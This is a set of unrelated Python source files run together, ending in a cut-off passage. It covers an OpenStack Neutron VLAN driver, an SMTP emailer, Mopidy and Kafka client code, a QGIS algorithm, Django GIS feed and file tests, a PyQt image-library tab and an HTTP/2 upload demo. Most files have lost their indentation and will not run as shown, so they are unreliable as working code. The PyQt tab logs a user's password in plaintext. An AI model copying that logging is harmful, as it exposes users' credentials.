# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
from neutron_lib import exceptions as exc
from oslo_config import cfg
from oslo_log import log
from six import moves
from neutron._i18n import _, _LE, _LI, _LW
from neutron.common import _deprecate
from neutron.conf.plugins.ml2.drivers import driver_type
from neutron.db import api as db_api
from neutron.db.models.plugins.ml2 import vlanallocation as vlan_alloc_model
from neutron.plugins.common import constants as p_const
from neutron.plugins.common import utils as plugin_utils
from neutron.plugins.ml2 import driver_api as api
from neutron.plugins.ml2.drivers import helpers
LOG = log.getLogger(__name__)
_deprecate._moved_global('VlanAllocation', new_module=vlan_alloc_model)
driver_type.register_ml2_drivers_vlan_opts()
class VlanTypeDriver(helpers.SegmentTypeDriver):
"""Manage state for VLAN networks with ML2.
The VlanTypeDriver implements the 'vlan' network_type. VLAN
network segments provide connectivity between VMs and other
devices using any connected IEEE 802.1Q conformant
physical_network segmented into virtual networks via IEEE 802.1Q
headers. Up to 4094 VLAN network segments can exist on each
available physical_network.
"""
def __init__(self):
super(VlanTypeDriver, self).__init__(vlan_alloc_model.VlanAllocation)
self._parse_network_vlan_ranges()
def _parse_network_vlan_ranges(self):
try:
self.network_vlan_ranges = plugin_utils.parse_network_vlan_ranges(
cfg.CONF.ml2_type_vlan.network_vlan_ranges)
except Exception:
LOG.exception(_LE("Failed to parse network_vlan_ranges. "
"Service terminated!"))
sys.exit(1)
LOG.info(_LI("Network VLAN ranges: %s"), self.network_vlan_ranges)
@db_api.retry_db_errors
def _sync_vlan_allocations(self):
session = db_api.get_session()
with session.begin(subtransactions=True):
# get existing allocations for all physical networks
allocations = dict()
allocs = (session.query(vlan_alloc_model.VlanAllocation).
with_lockmode('update'))
for alloc in allocs:
if alloc.physical_network not in allocations:
allocations[alloc.physical_network] = set()
allocations[alloc.physical_network].add(alloc)
# process vlan ranges for each configured physical network
for (physical_network,
vlan_ranges) in self.network_vlan_ranges.items():
# determine current configured allocatable vlans for
# this physical network
vlan_ids = set()
for vlan_min, vlan_max in vlan_ranges:
vlan_ids |= set(moves.range(vlan_min, vlan_max + 1))
# remove from table unallocated vlans not currently
# allocatable
if physical_network in allocations:
for alloc in allocations[physical_network]:
try:
# see if vlan is allocatable
vlan_ids.remove(alloc.vlan_id)
except KeyError:
# it's not allocatable, so check if its allocated
if not alloc.allocated:
# it's not, so remove it from table
LOG.debug("Removing vlan %(vlan_id)s on "
"physical network "
"%(physical_network)s from pool",
{'vlan_id': alloc.vlan_id,
'physical_network':
physical_network})
session.delete(alloc)
del allocations[physical_network]
# add missing allocatable vlans to table
for vlan_id in sorted(vlan_ids):
alloc = vlan_alloc_model.VlanAllocation(
physical_network=physical_network,
vlan_id=vlan_id,
allocated=False)
session.add(alloc)
# remove from table unallocated vlans for any unconfigured
# physical networks
for allocs in allocations.values():
for alloc in allocs:
if not alloc.allocated:
LOG.debug("Removing vlan %(vlan_id)s on physical "
"network %(physical_network)s from pool",
{'vlan_id': alloc.vlan_id,
'physical_network':
alloc.physical_network})
session.delete(alloc)
def get_type(self):
return p_const.TYPE_VLAN
def initialize(self):
self._sync_vlan_allocations()
LOG.info(_LI("VlanTypeDriver initialization complete"))
def is_partial_segment(self, segment):
return segment.get(api.SEGMENTATION_ID) is None
def validate_provider_segment(self, segment):
physical_network = segment.get(api.PHYSICAL_NETWORK)
segmentation_id = segment.get(api.SEGMENTATION_ID)
if physical_network:
if physical_network not in self.network_vlan_ranges:
msg = (_("physical_network '%s' unknown "
" for VLAN provider network") % physical_network)
raise exc.InvalidInput(error_message=msg)
if segmentation_id:
if not plugin_utils.is_valid_vlan_tag(segmentation_id):
msg = (_("segmentation_id out of range (%(min)s through "
"%(max)s)") %
{'min': p_const.MIN_VLAN_TAG,
'max': p_const.MAX_VLAN_TAG})
raise exc.InvalidInput(error_message=msg)
elif segmentation_id:
msg = _("segmentation_id requires physical_network for VLAN "
"provider network")
raise exc.InvalidInput(error_message=msg)
for key, value in segment.items():
if value and key not in [api.NETWORK_TYPE,
api.PHYSICAL_NETWORK,
api.SEGMENTATION_ID]:
msg = _("%s prohibited for VLAN provider network") % key
raise exc.InvalidInput(error_message=msg)
def reserve_provider_segment(self, session, segment):
filters = {}
physical_network = segment.get(api.PHYSICAL_NETWORK)
if physical_network is not None:
filters['physical_network'] = physical_network
vlan_id = segment.get(api.SEGMENTATION_ID)
if vlan_id is not None:
filters['vlan_id'] = vlan_id
if self.is_partial_segment(segment):
alloc = self.allocate_partially_specified_segment(
session, **filters)
if not alloc:
raise exc.NoNetworkAvailable()
else:
alloc = self.allocate_fully_specified_segment(
session, **filters)
if not alloc:
raise exc.VlanIdInUse(**filters)
return {api.NETWORK_TYPE: p_const.TYPE_VLAN,
api.PHYSICAL_NETWORK: alloc.physical_network,
api.SEGMENTATION_ID: alloc.vlan_id,
api.MTU: self.get_mtu(alloc.physical_network)}
def allocate_tenant_segment(self, session):
alloc = self.allocate_partially_specified_segment(session)
if not alloc:
return
return {api.NETWORK_TYPE: p_const.TYPE_VLAN,
api.PHYSICAL_NETWORK: alloc.physical_network,
api.SEGMENTATION_ID: alloc.vlan_id,
api.MTU: self.get_mtu(alloc.physical_network)}
def release_segment(self, session, segment):
physical_network = segment[api.PHYSICAL_NETWORK]
vlan_id = segment[api.SEGMENTATION_ID]
ranges = self.network_vlan_ranges.get(physical_network, [])
inside = any(lo <= vlan_id <= hi for lo, hi in ranges)
with session.begin(subtransactions=True):
query = (session.query(vlan_alloc_model.VlanAllocation).
filter_by(physical_network=physical_network,
vlan_id=vlan_id))
if inside:
count = query.update({"allocated": False})
if count:
LOG.debug("Releasing vlan %(vlan_id)s on physical "
"network %(physical_network)s to pool",
{'vlan_id': vlan_id,
'physical_network': physical_network})
else:
count = query.delete()
if count:
LOG.debug("Releasing vlan %(vlan_id)s on physical "
"network %(physical_network)s outside pool",
{'vlan_id': vlan_id,
'physical_network': physical_network})
if not count:
LOG.warning(_LW("No vlan_id %(vlan_id)s found on physical "
"network %(physical_network)s"),
{'vlan_id': vlan_id,
'physical_network': physical_network})
def get_mtu(self, physical_network):
seg_mtu = super(VlanTypeDriver, self).get_mtu()
mtu = []
if seg_mtu > 0:
mtu.append(seg_mtu)
if physical_network in self.physnet_mtus:
mtu.append(int(self.physnet_mtus[physical_network]))
return min(mtu) if mtu else 0
_deprecate._MovedGlobals()
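

# --- Illustrative sketch (not part of the driver) ---
# network_vlan_ranges comes from ml2_conf.ini, e.g.
#     network_vlan_ranges = physnet1:1000:2999,physnet2
# and plugin_utils.parse_network_vlan_ranges() turns it into a dict mapping
# each physical_network to a list of (vlan_min, vlan_max) tuples. The
# hand-built example below only shows the shape of that data and how the
# allocatable VLAN id set used by _sync_vlan_allocations() is derived from
# it; it never touches the database.
if __name__ == "__main__":
    example_ranges = {'physnet1': [(1000, 2999)], 'physnet2': []}
    for physnet, ranges in example_ranges.items():
        vlan_ids = set()
        for vlan_min, vlan_max in ranges:
            vlan_ids |= set(range(vlan_min, vlan_max + 1))
        print("%s: %d allocatable VLAN ids" % (physnet, len(vlan_ids)))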
|
# coding: utf-8
'''
emailer.py
Contains Emailer class to aid with sending emails from templates
'''
import atexit
import logging
import smtplib
from jinja2 import Environment, PackageLoader
from email.mime.text import MIMEText
from nhtg15_webapp import app
class Emailer:
def __init__(self, app):
self.defaultfrom = app.config['EMAIL_FROM']
self.smtp_host = app.config['SMTP_HOST']
self.logger = logging.getLogger('nhtg15_webapp.emailer')
self.smtp = None
self.jinjaenv = None
atexit.register(self.shutdown)
def smtp_open(self):
try:
status = self.smtp.noop()[0]
        except Exception:  # e.g. smtplib.SMTPServerDisconnected
            status = -1
        return status == 250
def get_template(self, template):
if self.jinjaenv is None:
self.jinjaenv = Environment(
loader=PackageLoader(
'nhtg15_webapp',
'templates'
)
)
return self.jinjaenv.get_template(template)
def send_template(self, to, subject, template, **kwargs):
template = self.get_template(template)
try:
msgfrom = kwargs['email_from']
except KeyError:
msgfrom = self.defaultfrom
self.send_text(
to,
subject,
template.render(**kwargs),
msgfrom
)
def send_text(self, to, subject, text, msgfrom=None):
if msgfrom is None:
msgfrom = self.defaultfrom
msg = MIMEText(
text,
'plain',
'utf-8'
)
msg['Subject'] = ("[AllergenAlert] - " + subject)
msg['From'] = msgfrom
if isinstance(to, list):
for email in to:
msg['To'] = email
else:
msg['To'] = to
self.send_message(msg)
def send_message(self, msg):
if self.smtp is None or not self.smtp_open():
self.smtp = smtplib.SMTP(self.smtp_host)
try:
self.smtp.sendmail(msg['From'], msg.get_all('To'), msg.as_string())
except smtplib.SMTPRecipientsRefused as e:
self.logger.error(
(
                    'SMTP server at {0} refused recipients {1} for '
'message with subject {2}'
).format(
self.smtp_host,
e.recipients,
msg['Subject']
)
)
except smtplib.SMTPHeloError as e:
self.logger.error(
(
'SMTP server at {0} did not reply properly to HELO for '
'message with subject {1}'
).format(
self.smtp_host,
msg['Subject']
)
)
except smtplib.SMTPSenderRefused as e:
self.logger.error(
(
'SMTP server at {0} did not allow sender {1} for '
'message with subject {2}'
).format(
self.smtp_host,
msg['From'],
msg['Subject']
)
)
except smtplib.SMTPDataError as e:
self.logger.error(
(
'SMTP server at {0} responded with unexpected error code '
'{1} with error message {2} for message with subject {3}'
).format(
self.smtp_host,
e.smtp_code,
e.smtp_error,
msg['Subject']
)
)
def shutdown(self):
if self.smtp is not None and self.smtp_open():
self.smtp.quit()
EMAILER = Emailer(app.APP)
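

# Minimal usage sketch (illustrative only): assumes EMAIL_FROM and SMTP_HOST
# are set in the app config and that a Jinja template named "alert.txt"
# exists in nhtg15_webapp/templates; the template name and the keyword
# argument passed through to render() are assumptions for this example.
if __name__ == "__main__":
    EMAILER.send_template(
        ['someone@example.com'],
        'Test alert',
        'alert.txt',
        message='Hello from the emailer usage sketch',
    )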
|
from ..mopidy_api import MopidyWSController
class LibraryController (MopidyWSController):
# DEPRECATED
def lookup(self, uri=None, uris=None, **options):
'''Lookup the given URIs.
If the URI expands to multiple tracks, the returned list will contain
them all.
:param uri: track URI
:type uri: string or :class:`None`
:param uris: track URIs
:type uris: list of string or :class:`None`
:rtype: list of :class:`mopidy.models.Track` if uri was set or
{uri: list of :class:`mopidy.models.Track`} if uris was set.
.. versionadded:: 1.0
The ``uris`` argument.
.. deprecated:: 1.0
The ``uri`` argument. Use ``uris`` instead.
'''
return self.mopidy_request('core.library.lookup', uri=uri, uris=uris, **options)
def refresh(self, uri=None, **options):
'''Refresh library. Limit to URI and below if an URI is given.
:param uri: directory or track URI
:type uri: string
'''
return self.mopidy_request('core.library.refresh', uri=uri, **options)
def get_images(self, uris, **options):
'''Lookup the images for the given URIs
Backends can use this to return image URIs for any URI they know about
be it tracks, albums, playlists... The lookup result is a dictionary
mapping the provided URIs to lists of images.
Unknown URIs or URIs the corresponding backend couldn't find anything
for will simply return an empty list for that URI.
:param uris: list of URIs to find images for
:type uris: list of string
:rtype: {uri: tuple of :class:`mopidy.models.Image`}
.. versionadded:: 1.0
'''
return self.mopidy_request('core.library.get_images', uris=uris, **options)
def get_distinct(self, field, query=None, **options):
'''List distinct values for a given field from the library.
This has mainly been added to support the list commands the MPD
protocol supports in a more sane fashion. Other frontends are not
recommended to use this method.
:param string field: One of ``track``, ``artist``, ``albumartist``,
``album``, ``composer``, ``performer``, ``date`` or ``genre``.
:param dict query: Query to use for limiting results, see
:meth:`search` for details about the query format.
:rtype: set of values corresponding to the requested field type.
.. versionadded:: 1.0
'''
return self.mopidy_request('core.library.get_distinct', field=field, query=query, **options)
# DEPRECATED
def search(self, query=None, uris=None, exact=False, **options):
'''Search the library for tracks where ``field`` contains ``values``.
If ``uris`` is given, the search is limited to results from within the
URI roots. For example passing ``uris=['file:']`` will limit the search
to the local backend.
Examples::
# Returns results matching 'a' in any backend
search({'any': ['a']})
# Returns results matching artist 'xyz' in any backend
search({'artist': ['xyz']})
# Returns results matching 'a' and 'b' and artist 'xyz' in any
# backend
search({'any': ['a', 'b'], 'artist': ['xyz']})
# Returns results matching 'a' if within the given URI roots
# "file:///media/music" and "spotify:"
search({'any': ['a']}, uris=['file:///media/music', 'spotify:'])
# Returns results matching artist 'xyz' and 'abc' in any backend
search({'artist': ['xyz', 'abc']})
:param query: one or more queries to search for
:type query: dict
:param uris: zero or more URI roots to limit the search to
:type uris: list of string or :class:`None`
:param exact: if the search should use exact matching
:type exact: :class:`bool`
:rtype: list of :class:`mopidy.models.SearchResult`
.. versionadded:: 1.0
The ``exact`` keyword argument, which replaces :meth:`find_exact`.
.. deprecated:: 1.0
Previously, if the query was empty, and the backend could support
it, all available tracks were returned. This has not changed, but
it is strongly discouraged. No new code should rely on this
behavior.
.. deprecated:: 1.1
Providing the search query via ``kwargs`` is no longer supported.
'''
return self.mopidy_request('core.library.search', query=query, uris=uris, exact=exact, **options)
# DEPRECATED
def find_exact(self, query=None, uris=None, **options):
'''Search the library for tracks where ``field`` is ``values``.
.. deprecated:: 1.0
Use :meth:`search` with ``exact`` set.
'''
return self.mopidy_request('core.library.find_exact', query=query, uris=uris, **options)
def browse(self, uri, **options):
'''Browse directories and tracks at the given ``uri``.
``uri`` is a string which represents some directory belonging to a
        backend. To get the initial root directories for backends pass
:class:`None` as the URI.
Returns a list of :class:`mopidy.models.Ref` objects for the
directories and tracks at the given ``uri``.
The :class:`~mopidy.models.Ref` objects representing tracks keep the
track's original URI. A matching pair of objects can look like this::
Track(uri='dummy:/foo.mp3', name='foo', artists=..., album=...)
Ref.track(uri='dummy:/foo.mp3', name='foo')
The :class:`~mopidy.models.Ref` objects representing directories have
backend specific URIs. These are opaque values, so no one but the
backend that created them should try and derive any meaning from them.
The only valid exception to this is checking the scheme, as it is used
to route browse requests to the correct backend.
For example, the dummy library's ``/bar`` directory could be returned
like this::
Ref.directory(uri='dummy:directory:/bar', name='bar')
:param string uri: URI to browse
:rtype: list of :class:`mopidy.models.Ref`
.. versionadded:: 0.18
'''
return self.mopidy_request('core.library.browse', uri=uri, **options)
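

# Usage sketch (illustrative only): a LibraryController is normally reached
# through a connected client object rather than instantiated directly. The
# client construction and the "library" attribute name below are assumptions;
# only the method calls mirror the wrappers defined above.
#
#     client = ...                 # some connected MopidyWSController-based client
#     client.library.get_images(uris=['local:track:song.mp3'])
#     client.library.search({'artist': ['xyz']}, uris=['local:'])
#     client.library.browse(None)  # root directories of all backends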
|
from __future__ import absolute_import
from itertools import cycle
import logging
import random
import six
from six.moves import xrange
from .base import Producer
log = logging.getLogger(__name__)
class SimpleProducer(Producer):
"""A simple, round-robin producer.
See Producer class for Base Arguments
Additional Arguments:
random_start (bool, optional): randomize the initial partition which
the first message block will be published to, otherwise
if false, the first message block will always publish
to partition 0 before cycling through each partition,
defaults to True.
"""
def __init__(self, *args, **kwargs):
self.partition_cycles = {}
self.random_start = kwargs.pop('random_start', True)
super(SimpleProducer, self).__init__(*args, **kwargs)
def _next_partition(self, topic):
if topic not in self.partition_cycles:
if not self.client.has_metadata_for_topic(topic):
self.client.load_metadata_for_topics(topic)
self.partition_cycles[topic] = cycle(self.client.get_partition_ids_for_topic(topic))
# Randomize the initial partition that is returned
if self.random_start:
num_partitions = len(self.client.get_partition_ids_for_topic(topic))
for _ in xrange(random.randint(0, num_partitions-1)):
next(self.partition_cycles[topic])
return next(self.partition_cycles[topic])
def send_messages(self, topic, *msg):
if not isinstance(topic, six.binary_type):
topic = topic.encode('utf-8')
partition = self._next_partition(topic)
return super(SimpleProducer, self).send_messages(
topic, partition, *msg
)
def __repr__(self):
return '<SimpleProducer batch=%s>' % self.async
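

# Usage sketch (illustrative only; the client class name and broker address
# are assumptions -- legacy kafka-python exposed a SimpleClient/KafkaClient
# that this round-robin producer was paired with):
#
#     client = SimpleClient('localhost:9092')
#     producer = SimpleProducer(client, random_start=True)
#     producer.send_messages('my-topic', b'message one', b'message two')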
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
SelectByExpression.py
---------------------
Date : July 2014
Copyright : (C) 2014 by Michaël Douchin
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Michael Douchin'
__date__ = 'July 2014'
__copyright__ = '(C) 2014, Michael Douchin'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import processing
from qgis.core import QgsExpression, QgsFeatureRequest
from processing.core.GeoAlgorithmExecutionException import GeoAlgorithmExecutionException
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterSelection
from processing.core.outputs import OutputVector
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterString
class SelectByExpression(GeoAlgorithm):
LAYERNAME = 'LAYERNAME'
    EXPRESSION = 'EXPRESSION'
RESULT = 'RESULT'
METHOD = 'METHOD'
METHODS = ['creating new selection', 'adding to current selection',
'removing from current selection']
def defineCharacteristics(self):
self.name = 'Select by expression'
self.group = 'Vector selection tools'
self.addParameter(ParameterVector(self.LAYERNAME,
self.tr('Input Layer'), [ParameterVector.VECTOR_TYPE_ANY]))
self.addParameter(ParameterString(self.EXPRESSION,
self.tr("Expression")))
self.addParameter(ParameterSelection(self.METHOD,
self.tr('Modify current selection by'), self.METHODS, 0))
self.addOutput(OutputVector(self.RESULT, self.tr('Selected (expression)'), True))
def processAlgorithm(self, progress):
filename = self.getParameterValue(self.LAYERNAME)
layer = processing.getObject(filename)
oldSelection = set(layer.selectedFeaturesIds())
method = self.getParameterValue(self.METHOD)
# Build QGIS request with expression
expression = self.getParameterValue(self.EXPRESSION)
qExp = QgsExpression(expression)
if not qExp.hasParserError():
qReq = QgsFeatureRequest(qExp)
else:
raise GeoAlgorithmExecutionException(qExp.parserErrorString())
selected = [f.id() for f in layer.getFeatures(qReq)]
if method == 1:
selected = list(oldSelection.union(selected))
elif method == 2:
selected = list(oldSelection.difference(selected))
# Set the selection
layer.setSelectedFeatures(selected)
self.setOutputValue(self.RESULT, filename)
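

# Illustrative note (not part of the algorithm): the EXPRESSION parameter takes
# a QGIS expression string that QgsExpression evaluates per feature, e.g.
#
#     "POPULATION" > 10000 AND "NAME" LIKE 'A%'
#
# METHOD 0 replaces the current selection, 1 adds the matching features to it,
# and 2 removes them from it, as implemented in processAlgorithm() above.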
|
from __future__ import unicode_literals
from django.contrib.gis import feeds
from .models import City
class TestGeoRSS1(feeds.Feed):
link = '/city/'
title = 'Test GeoDjango Cities'
def items(self):
return City.objects.all()
def item_link(self, item):
return '/city/%s/' % item.pk
def item_geometry(self, item):
return item.point
class TestGeoRSS2(TestGeoRSS1):
def geometry(self, obj):
        # This should attach a <georss:box> element for the extent of
        # the cities in the database. This tuple came from
# calling `City.objects.aggregate(Extent())` -- we can't do that call
# here because `Extent` is not implemented for MySQL/Oracle.
return (-123.30, -41.32, 174.78, 48.46)
def item_geometry(self, item):
# Returning a simple tuple for the geometry.
return item.point.x, item.point.y
class TestGeoAtom1(TestGeoRSS1):
feed_type = feeds.GeoAtom1Feed
class TestGeoAtom2(TestGeoRSS2):
feed_type = feeds.GeoAtom1Feed
def geometry(self, obj):
# This time we'll use a 2-tuple of coordinates for the box.
return ((-123.30, -41.32), (174.78, 48.46))
class TestW3CGeo1(TestGeoRSS1):
feed_type = feeds.W3CGeoFeed
# The following feeds are invalid, and will raise exceptions.
class TestW3CGeo2(TestGeoRSS2):
feed_type = feeds.W3CGeoFeed
class TestW3CGeo3(TestGeoRSS1):
feed_type = feeds.W3CGeoFeed
def item_geometry(self, item):
from django.contrib.gis.geos import Polygon
return Polygon(((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
# The feed dictionary to use for URLs.
feed_dict = {
'rss1': TestGeoRSS1,
'rss2': TestGeoRSS2,
'atom1': TestGeoAtom1,
'atom2': TestGeoAtom2,
'w3cgeo1': TestW3CGeo1,
'w3cgeo2': TestW3CGeo2,
'w3cgeo3': TestW3CGeo3,
}
|
#!/usr/bin/env python3
#encoding=utf-8
'''
Display the images under the Library folder
'''
import os
from PyQt5.QtCore import Qt, pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import QWidget, QSizePolicy
from .ui_LibraryTab import Ui_Tab
from .GridWidget import GridWidget
from utils import getPasswordInput
from utils.logUtils import Log
class LibraryTab(QWidget, Ui_Tab):
# property
columnSize = 3
# signals
passwordEntered = pyqtSignal(str)
def __init__(self, parent=None):
super().__init__(parent)
# setup widgets
self.setupUi(self)
self.btn_enterPassword.clicked.connect(
self.btn_enterPassword_clicked
)
@pyqtSlot()
def btn_enterPassword_clicked(self):
password, isOK = getPasswordInput(self)
if isOK:
Log.d('Password is:{}'.format(password))
self.passwordEntered.emit(password)
def setLibraryPath(self, libpath):
self.libpath = libpath
def refresh(self):
libfiles = []
for filename in os.listdir(self.libpath):
            if filename.endswith(('.jpeg', '.jpg')):
libfiles.append(os.path.join(self.libpath, filename))
Log.i('files in library:{}'.format(libfiles))
self.libraryWidgets = []
sp = QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)
sp.setHorizontalStretch(0)
sp.setVerticalStretch(0)
        i = -1  # initialise i in case libfiles is empty
for i, filepath in enumerate(libfiles):
col = i % self.columnSize
row = i // self.columnSize
widget = GridWidget(self.scrollAreaWidgetContents)
sp.setHeightForWidth(widget.sizePolicy().hasHeightForWidth())
widget.setSizePolicy(sp)
widget.setContent(filepath, (250, 250))
self.gridLayout.addWidget(
widget, row, col, Qt.AlignHCenter | Qt.AlignVCenter
)
self.libraryWidgets.append(widget)
while i < 11:
i += 1
col = i % self.columnSize
row = i // self.columnSize
widget = GridWidget(self.scrollAreaWidgetContents)
sp.setHeightForWidth(widget.sizePolicy().hasHeightForWidth())
widget.setSizePolicy(sp)
widget.setContent('', None)
self.gridLayout.addWidget(
widget, row, col, Qt.AlignHCenter | Qt.AlignVCenter
)
self.libraryWidgets.append(widget)
|
# -*- coding: utf-8 -*-
"""
post_request.py
~~~~~~~~~~~~~~~
A short example that demonstrates a client that makes POST requests to certain
websites.
This example is intended to demonstrate how to handle uploading request bodies.
In this instance, a file will be uploaded. In order to handle arbitrary files,
this example also demonstrates how to obey HTTP/2 flow control rules.
Takes one command-line argument: a path to a file in the filesystem to upload.
If none is present, uploads this file.
"""
from __future__ import print_function
import mimetypes
import os
import sys
from twisted.internet import reactor, defer
from twisted.internet.endpoints import connectProtocol, SSL4ClientEndpoint
from twisted.internet.protocol import Protocol
from twisted.internet.ssl import optionsForClientTLS
from h2.connection import H2Connection
from h2.events import (
ResponseReceived, DataReceived, StreamEnded, StreamReset, WindowUpdated,
SettingsAcknowledged,
)
AUTHORITY = u'nghttp2.org'
PATH = '/httpbin/post'
class H2Protocol(Protocol):
def __init__(self, file_path):
self.conn = H2Connection()
self.known_proto = None
self.request_made = False
self.request_complete = False
self.file_path = file_path
self.flow_control_deferred = None
self.fileobj = None
self.file_size = None
def connectionMade(self):
"""
Called by Twisted when the TCP connection is established. We can start
sending some data now: we should open with the connection preamble.
"""
self.conn.initiate_connection()
self.transport.write(self.conn.data_to_send())
def dataReceived(self, data):
"""
Called by Twisted when data is received on the connection.
We need to check a few things here. Firstly, we want to validate that
we actually negotiated HTTP/2: if we didn't, we shouldn't proceed!
Then, we want to pass the data to the protocol stack and check what
events occurred.
"""
if not self.known_proto:
self.known_proto = self.transport.negotiatedProtocol
assert self.known_proto == b'h2'
events = self.conn.receive_data(data)
for event in events:
if isinstance(event, ResponseReceived):
self.handleResponse(event.headers)
elif isinstance(event, DataReceived):
self.handleData(event.data)
elif isinstance(event, StreamEnded):
self.endStream()
elif isinstance(event, SettingsAcknowledged):
self.settingsAcked(event)
elif isinstance(event, StreamReset):
reactor.stop()
raise RuntimeError("Stream reset: %d" % event.error_code)
elif isinstance(event, WindowUpdated):
self.windowUpdated(event)
data = self.conn.data_to_send()
if data:
self.transport.write(data)
def settingsAcked(self, event):
"""
Called when the remote party ACKs our settings. We send a SETTINGS
frame as part of the preamble, so if we want to be very polite we can
wait until the ACK for that frame comes before we start sending our
request.
"""
if not self.request_made:
self.sendRequest()
def handleResponse(self, response_headers):
"""
Handle the response by printing the response headers.
"""
for name, value in response_headers:
print("%s: %s" % (name.decode('utf-8'), value.decode('utf-8')))
print("")
def handleData(self, data):
"""
We handle data that's received by just printing it.
"""
print(data, end='')
def endStream(self):
"""
We call this when the stream is cleanly ended by the remote peer. That
means that the response is complete.
Because this code only makes a single HTTP/2 request, once we receive
the complete response we can safely tear the connection down and stop
the reactor. We do that as cleanly as possible.
"""
self.request_complete = True
self.conn.close_connection()
self.transport.write(self.conn.data_to_send())
self.transport.loseConnection()
def windowUpdated(self, event):
"""
We call this when the flow control window for the connection or the
stream has been widened. If there's a flow control deferred present
(that is, if we're blocked behind the flow control), we fire it.
Otherwise, we do nothing.
"""
if self.flow_control_deferred is None:
return
# Make sure we remove the flow control deferred to avoid firing it
# more than once.
flow_control_deferred = self.flow_control_deferred
self.flow_control_deferred = None
flow_control_deferred.callback(None)
def connectionLost(self, reason=None):
"""
Called by Twisted when the connection is gone. Regardless of whether
it was clean or not, we want to stop the reactor.
"""
if self.fileobj is not None:
self.fileobj.close()
if reactor.running:
reactor.stop()
def sendRequest(self):
"""
Send the POST request.
A POST request is made up of one headers frame, and then 0+ data
frames. This method begins by sending the headers, and then starts a
series of calls to send data.
"""
# First, we need to work out how large the file is.
self.file_size = os.stat(self.file_path).st_size
# Next, we want to guess a content-type and content-encoding.
content_type, content_encoding = mimetypes.guess_type(self.file_path)
# Now we can build a header block.
request_headers = [
(':method', 'POST'),
(':authority', AUTHORITY),
(':scheme', 'https'),
(':path', PATH),
('content-length', str(self.file_size)),
]
if content_type is not None:
request_headers.append(('content-type', content_type))
if content_encoding is not None:
request_headers.append(('content-encoding', content_encoding))
self.conn.send_headers(1, request_headers)
self.request_made = True
# We can now open the file.
self.fileobj = open(self.file_path, 'rb')
# We now need to send all the relevant data. We do this by checking
# what the acceptable amount of data is to send, and sending it. If we
# find ourselves blocked behind flow control, we then place a deferred
# and wait until that deferred fires.
self.sendFileData()
def sendFileData(self):
"""
Send some file data on the connection.
"""
# Firstly, check what the flow control window is for stream 1.
window_size = self.conn.local_flow_control_window(stream_id=1)
# Next, check what the maximum frame size is.
max_frame_size = self.conn.max_outbound_frame_size
# We will send no more than the window size or the remaining file size
# of data in this call, whichever is smaller.
bytes_to_send = min(window_size, self.file_size)
# We now need to send a number of data frames.
while bytes_to_send > 0:
chunk_size = min(bytes_to_send, max_frame_size)
data_chunk = self.fileobj.read(chunk_size)
self.conn.send_data(stream_id=1, data=data_chunk)
bytes_to_send -= chunk_size
self.file_size -= chunk_size
# We've prepared a whole chunk of data to send. If the file is fully
# sent, we also want to end the stream: we're done here.
if self.file_size == 0:
self.conn.end_stream(stream_id=1)
else:
# We've still got data left to send but the window is closed. Save
# a Deferred that will call us when the window gets opened.
self.flow_control_deferred = defer.Deferred()
self.flow_control_deferred.addCallback(self.sendFileData)
self.transport.write(self.conn.data_to_send())
try:
filename = sys.argv[1]
except IndexError:
filename = __file__
options = optionsForClientTLS(
hostname=AUTHORITY,
acceptableProtocols=[b'h2'],
)
connectProtocol(
SSL4ClientEndpoint(reactor, AUTHORITY, 443, options),
H2Protocol(filename)
)
reactor.run()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import gzip
import os
import struct
import tempfile
import unittest
from io import BytesIO, StringIO, TextIOWrapper
from django.core.files import File
from django.core.files.base import ContentFile
from django.core.files.move import file_move_safe
from django.core.files.temp import NamedTemporaryFile
from django.core.files.uploadedfile import SimpleUploadedFile, UploadedFile
from django.test import mock
from django.utils import six
from django.utils._os import upath
try:
from PIL import Image
except ImportError:
Image = None
else:
from django.core.files import images
class FileTests(unittest.TestCase):
def test_unicode_uploadedfile_name(self):
uf = UploadedFile(name='¿Cómo?', content_type='text')
self.assertIs(type(repr(uf)), str)
def test_unicode_file_name(self):
f = File(None, 'djángö')
self.assertIs(type(repr(f)), str)
def test_context_manager(self):
orig_file = tempfile.TemporaryFile()
base_file = File(orig_file)
with base_file as f:
self.assertIs(base_file, f)
self.assertFalse(f.closed)
self.assertTrue(f.closed)
self.assertTrue(orig_file.closed)
def test_namedtemporaryfile_closes(self):
"""
The symbol django.core.files.NamedTemporaryFile is assigned as
a different class on different operating systems. In
any case, the result should minimally mock some of the API of
tempfile.NamedTemporaryFile from the Python standard library.
"""
tempfile = NamedTemporaryFile()
self.assertTrue(hasattr(tempfile, "closed"))
self.assertFalse(tempfile.closed)
tempfile.close()
self.assertTrue(tempfile.closed)
def test_file_mode(self):
# Should not set mode to None if it is not present.
# See #14681, stdlib gzip module crashes if mode is set to None
file = SimpleUploadedFile("mode_test.txt", b"content")
self.assertFalse(hasattr(file, 'mode'))
gzip.GzipFile(fileobj=file)
def test_file_iteration(self):
"""
File objects should yield lines when iterated over.
Refs #22107.
"""
file = File(BytesIO(b'one\ntwo\nthree'))
self.assertEqual(list(file), [b'one\n', b'two\n', b'three'])
def test_file_iteration_windows_newlines(self):
"""
#8149 - File objects with \r\n line endings should yield lines
when iterated over.
"""
f = File(BytesIO(b'one\r\ntwo\r\nthree'))
self.assertEqual(list(f), [b'one\r\n', b'two\r\n', b'three'])
def test_file_iteration_mac_newlines(self):
"""
#8149 - File objects with \r line endings should yield lines
when iterated over.
"""
f = File(BytesIO(b'one\rtwo\rthree'))
